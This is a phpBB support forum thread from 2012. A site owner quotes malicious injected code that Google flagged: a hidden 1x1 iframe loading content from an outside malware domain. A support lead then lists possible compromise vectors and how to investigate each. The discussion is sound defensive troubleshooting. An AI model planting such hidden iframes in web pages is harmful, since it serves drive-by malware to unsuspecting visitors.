Annoying malaware google warning

Get help with installation and running phpBB 3.0.x here. Please do not post bug reports, feature requests, or MOD-related questions here.
Ideas Centre
Forum rules
END OF SUPPORT: 1 January 2017 (announcement)
Locked
azzurri
Registered User
Posts: 899
Joined: Fri Jul 21, 2006 7:48 pm

Annoying malaware google warning

Post by azzurri » Tue Mar 13, 2012 7:58 pm

Hi,

For a period of 6 months I've been getting warnings from Google that my site is infected with malaware, bad code. It is indeed. My host helped me find some bad code with "Grep" and found the code in Files/index.htm.

Of all my sites and pages, it is only my PhpBB that is infected. I have always updated to latest release. I do have some mods installed, but I'm not sure if that's the problem.

If I remove the code, it just comes back. I don't know what else to do. I'm quite desperate to be honest.
Anyone else have this problem?

This time Google warns about this code...

Code: Select all

<iframe src="http://hlqmwspl.co.cc/QQkFBg0MBAEDAAABEkcJBQcEB
AYDBAAMBA==" width="1" height="1">
It's always hlqmwspl.co.cc similar code.

User avatar
Noxwizard
Support Team Leader
Support Team Leader
Posts: 10262
Joined: Mon Jun 27, 2005 8:41 pm
Location: Texas, USA
Name: Patrick Webster
Contact:

Re: Annoying malaware google warning

Post by Noxwizard » Tue Mar 13, 2012 8:13 pm

Since you chose not to provide any information in your last incident ticket, you'll have to go through this manually. This can happen for several reasons:
  1. There's a backdoor script sitting somewhere on your account
  2. There's a vulnerability in one of your other scripts
  3. Your FTP credentials have been compromised
  4. There's a compromised account elsewhere on the server and the accounts aren't jailed
  5. There's a vulnerability in the server software
1 & 2 can be found by sifting through your access logs looking for anomalous accesses. 3 can be checked by going through your FTP logs and looking for IPs that aren't yours. For each script you run on your site, you should run a comparison (i.e. WinMerge) against a clean copy of the software and check for changes. It will also list any new files that do not normally exist in the software. If 3 is the case, then you need to run antivirus scans on every computer that has ever accessed your site's FTP account. 4 & 5 are when you've exhausted 1 - 3.
[Support Template] - [Read Before Posting] - [phpBB Knowledge Base]
Do not contact me for private support, please share the question in our forums.

azzurri
Registered User
Posts: 899
Joined: Fri Jul 21, 2006 7:48 pm

Re: Annoying malaware google warning

Post by azzurri » Tue Mar 13, 2012 8:29 pm

Thank you for your reply. Very kind of you. Sadly though I am not very good with these things. I know nothing about backdoors and servers and so on. I'm just an amateur trying to run a forum. I've been doing so for many years though without problems. To be honest, it seems as if I will have to give up since it will be up to me to fix this and I won't be able to. I don't have the knowledge to do so. This really, really sucks :cry:

Slackervaara
Registered User
Posts: 195
Joined: Thu Feb 28, 2008 7:46 am

Re: Annoying malaware google warning

Post by Slackervaara » Tue Mar 13, 2012 9:06 pm

With this malware scanner you could get some extra information which file(s) are infected:
http://sitecheck.sucuri.net/scanner/

User avatar
Noxwizard
Support Team Leader
Support Team Leader
Posts: 10262
Joined: Mon Jun 27, 2005 8:41 pm
Location: Texas, USA
Name: Patrick Webster
Contact:

Re: Annoying malaware google warning

Post by Noxwizard » Wed Mar 14, 2012 1:08 am

At this stage, scanners like that aren't any help. They only let you know that the site has malware on it, but we already know that. It won't help you find the actual modified files.
[Support Template] - [Read Before Posting] - [phpBB Knowledge Base]
Do not contact me for private support, please share the question in our forums.

Locked

Return to “[3.0.x] Support Forum”

Who is online

Users browsing this forum: Bing [Bot], Google [Bot], Yandex [Bot] and 58 guests